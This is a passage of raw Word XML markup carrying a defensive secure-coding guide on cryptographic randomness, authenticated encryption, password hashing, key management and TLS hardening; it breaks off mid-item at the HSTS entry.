    <w:p w14:paraId="4FC4E03D"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1. Implement Cryptographically Secure Randomness (CSPRNG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDB70F5"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lastRenderedPageBreak/>
        <w:t>Never use standard mathematical pseudo-random number generators for security-sensitive operations like token generation, session management, or key generation. Use native, cryptographically secure alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538936F4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> module (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>secrets.token_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>(32)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) instead of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E0136" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Java:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>java.security.SecureRandom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>java.util.Random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5154E6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>C++:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>random_device</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain non-deterministic hardware entropy instead of seeding </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>std::mt19937</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with system time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132E50F"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2. Adopt Authenticated Encryption with Associated Data (AEAD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A1A55"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Pure symmetric encryption protects data confidentiality but does not guarantee integrity. If an attacker modifies the ciphertext, the system may still attempt to decrypt it, introducing padding oracle vulnerabilities. Always use AEAD cipher modes, which bundle encryption and cryptographic verification together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15211D53" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Standardize on </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>AES-GCM</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Galois/Counter Mode) or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>ChaCha20-Poly1305</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326EC8F4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure that a unique, non-repeating Initialization Vector (IV) or nonce is generated using a CSPRNG for </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>every single</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> encryption operation. Never reuse an IV with the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1FFD46"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3. Implement Strong, Adaptive Password Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69444EF4"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Do not use standard cryptographic hash functions (like SHA-256 or SHA-512) or legacy functions (like MD5 or SHA-1) for credential storage. Standard hashes are optimized for speed, allowing attackers to perform billions of guesses per second using GPUs. Instead, use slow, memory-hard, adaptive algorithms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95CF63" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Argon2id</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the current industry standard) or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>scrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for new applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42069F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">For legacy systems or specific enterprise constraints, use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PBKDF2-HMACSHA-512</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an appropriately high work factor (iteration count).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204CCC3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Automatically generate a unique, cryptographically random salt for every password before hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D304E39"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4. Secure Key Derivation from Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0135C471"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 xml:space="preserve">If an encryption key must be derived from a user-supplied password rather than randomly generated, do not feed the raw password string directly into an encryption cipher. Pass it through a Key Derivation Function (KDF) such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PBKDF2</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Argon2</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to stretch the password into a high-entropy cryptographically secure key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BDCD77" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Architecture &amp; Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7FFA5D"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Secure coding prevents local errors, but a robust architecture establishes a defense-in-depth perimeter that limits the blast radius if an individual component fails or a database is leaked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4A69A"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1. Data Classification and Minimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6837D0"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An application cannot protect data it doesn't know exists. Architectures must implement a strict data classification schema from inception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32068C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Identify and Label:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Catalog all processed, stored, or transmitted data into categories (e.g., Public, Internal, Confidential, Highly Sensitive/Restricted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6631F67C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce Minimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not retain sensitive data unnecessarily. If data is no longer needed for business logic, immediately discard, truncate, or tokenize it (using PCI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>DSScompliant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> tokenization solutions). Data that does not exist in the database cannot be stolen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C9D3C8"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2. Isolated Hardware and Cloud Key Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACE663D"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Treat cryptographic keys as the most sensitive assets in the enterprise infrastructure. Never store keys in configuration files, environmental variables, or source control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B35100B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>De-couple Keys from Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilize external, dedicated Key Management Services (KMS) or hardware-based environments such as Cloud HSMs (Hardware Security Modules) or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HashiCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB566B0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Access Control Policies:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Principle of Least Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the infrastructure layer. The application server should only have the permission to request data encryption or decryption operations via an API, without ever having direct access to read the underlying master key material itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63314EF8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Automate Rotation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Design the architecture to handle seamless, automated cryptographic key rotation without disrupting service availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF629F"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3. Strict Zero-Trust Transport Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467687E"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Assume that any network layer can be compromised. Enforce strict, non-negotiable end-to-end transport layer controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2097FE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>TLS Hardening:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>TLS 1.2 or TLS 1.3 only</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> across all internal and external communication boundaries. Completely disable support for legacy protocols (SSLv3, TLS 1.0, TLS 1.1) and weak, null, or CBC-based cipher suites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373CC87" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTP Strict Transport Security (HSTS):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
